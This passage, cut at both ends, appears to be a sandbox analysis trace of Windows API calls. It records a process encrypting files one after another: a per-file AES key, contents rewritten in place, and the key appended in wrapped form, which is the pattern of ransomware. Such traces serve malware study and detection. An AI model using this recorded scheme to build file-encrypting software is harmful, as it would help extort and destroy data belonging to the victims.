halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.438] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1517) returned 1 [0145.438] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1517) returned 1 [0145.438] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x4cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.440] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.440] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.440] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.440] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.440] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5ed, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5ed, lpOverlapped=0x0) returned 1 [0145.440] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.440] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5ed, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5f0) returned 1 [0145.440] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.440] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5f0, lpOverlapped=0x0) returned 1 [0145.440] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.440] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.441] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.441] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.441] CloseHandle (hObject=0x198) returned 1 [0145.461] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.466] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.466] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.466] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.466] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", dwFileAttributes=0x80) returned 1 [0145.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.470] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0145.470] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0145.470] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.470] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.471] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.472] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.472] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.472] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.472] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0145.472] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.472] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0145.472] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.472] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0145.472] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.472] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.472] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.473] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.473] CloseHandle (hObject=0x198) returned 1 [0145.495] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.500] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.501] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.501] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", dwFileAttributes=0x80) returned 1 [0145.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.502] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0145.502] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0145.502] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.502] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.504] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.504] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.504] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.504] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.504] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0145.504] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.504] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0145.504] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.504] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0145.505] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.505] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.505] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.505] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.505] CloseHandle (hObject=0x198) returned 1 [0145.527] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.532] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.533] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.533] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", dwFileAttributes=0x80) returned 1 [0145.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.534] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0145.534] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0145.534] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.534] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.536] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.536] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.536] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.536] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.536] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0145.536] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.536] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0145.536] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.536] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0145.537] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.537] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.537] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.537] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.537] CloseHandle (hObject=0x198) returned 1 [0145.557] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.561] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.561] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.562] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", dwFileAttributes=0x80) returned 1 [0145.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.572] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1454) returned 1 [0145.572] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1454) returned 1 [0145.572] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x48c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.572] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.573] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.573] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.573] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.573] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.573] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5ae, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5ae, lpOverlapped=0x0) returned 1 [0145.573] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.573] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5b0) returned 1 [0145.573] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.573] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5b0, lpOverlapped=0x0) returned 1 [0145.574] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.574] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.574] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.574] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.574] CloseHandle (hObject=0x198) returned 1 [0145.599] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.603] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.604] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.604] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", dwFileAttributes=0x80) returned 1 [0145.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.604] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1454) returned 1 [0145.604] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1454) returned 1 [0145.604] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x48c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.604] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.606] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.606] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.606] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.606] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.606] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5ae, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5ae, lpOverlapped=0x0) returned 1 [0145.606] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.606] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5b0) returned 1 [0145.606] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.606] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, 